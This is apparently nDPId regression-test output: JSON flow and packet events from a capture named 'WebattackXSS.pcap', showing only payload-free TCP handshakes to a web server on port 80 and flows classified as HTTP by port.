-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347390580,"flow_last_seen":1499347390580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347390580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1499347390580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMt1sAFC4TAmHAAAAAKACchA5UQAAAgQFtAQCCAoBOoToAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1499347390580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Wzc2WIguEwJiKAScSCg8wAAAgQFtAQCCAoD5FZeATqE6AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1499347390581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347390581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMt1sAFC4TAmI3NliIYAQAOU\/+gAAAQEICgE6hOkD5FZe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347393135,"flow_last_seen":1499347393135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347393135,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1499347393135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89hRAAD4Gz7usEAABwKgKMt2GAFBIK3FzAAAAAKACchA+7QAAAgQFtAQCCAoBOodnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1499347393135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Yb1ZkzcSCtxdKAScSCgxwAAAgQFtAQCCAoD5FjdATqHZwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1499347393136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347393136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09hVAAD4Gz8KsEAABwKgKMt2GAFBIK3F09WZM3YAQAOU\/zwAAAQEICgE6h2cD5Fjd"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347394398,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eldAAD4GS3msEAABwKgKMt2UAFCjvfL0AAAAAKACchBgjwAAAgQFtAQCCAoBOoijAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ZQ04Dogo73y9aAScSCUcAAAAgQFtAQCCAoD5FoZATqIowEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1499347394399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347394399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0elhAAD4GS4CsEAABwKgKMt2UAFCjvfL1NOA6IYAQAOUzeAAAAQEICgE6iKMD5FoZ"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347395736,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347395736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86QJAAD4G3M2sEAABwKgKMt2iAFAP0mDzAAAAAKACchCFIAAAAgQFtAQCCAoBOonxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3aKdN8ZwD9Jg9KAScSDDCwAAAgQFtAQCCAoD5FtnATqJ8QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1499347395737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347395737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06QNAAD4G3NSsEAABwKgKMt2iAFAP0mD0nTfGcYAQAOViEgAAAQEICgE6ifID5Ftn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347398258,"flow_last_seen":1499347398258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347398258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1499347398258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RfFAAD4Gf9+sEAABwKgKMt28AFBXE8mZAAAAAKACchDSpwAAAgQFtAQCCAoBOoxoAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1499347398258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3byK2p7LVxPJmqAScSBIHgAAAgQFtAQCCAoD5F3eATqMaAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1499347398259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347398259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RfJAAD4Gf+asEAABwKgKMt28AFBXE8maitqezIAQAOXnJQAAAQEICgE6jGgD5F3e"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347399514,"flow_last_seen":1499347399514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347399514,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1499347399514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gr5AAD4GQxKsEAABwKgKMt3KAFDFpQ8cAAAAAKACchAdSwAAAgQFtAQCCAoBOo2iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1499347399514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3cp+0BfYxaUPHaAScSAkhQAAAgQFtAQCCAoD5F8YATqNogEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1499347399515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347399515,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gr9AAD4GQxmsEAABwKgKMt3KAFDFpQ8dftAX2YAQAOXDjAAAAQEICgE6jaID5F8Y"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347400752,"flow_last_seen":1499347400752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347400752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1499347400752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pCxAAD4GIaSsEAABwKgKMt3YAFC0oCr7AAAAAKACchARLgAAAgQFtAQCCAoBOo7XAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1499347400752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3diBtZGUtKAq\/KAScSCakQAAAgQFtAQCCAoD5GBNATqO1wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3610,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1499347400753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347400753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pC1AAD4GIausEAABwKgKMt3YAFC0oCr8gbWRlYAQAOU5mAAAAQEICgE6jtgD5GBN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347403327,"flow_last_seen":1499347403327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347403327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1499347403327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89cJAAD4G0A2sEAABwKgKMt3yAFCprWSZAAAAAKACchDf5AAAAgQFtAQCCAoBOpFbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1499347403327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3fKtl6seqa1kmqAScSAhWAAAAgQFtAQCCAoD5GLRATqRWwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1499347403328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347403328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09cNAAD4G0BSsEAABwKgKMt3yAFCprWSarZerH4AQAOXAXwAAAQEICgE6kVsD5GLR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347404575,"flow_last_seen":1499347404575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 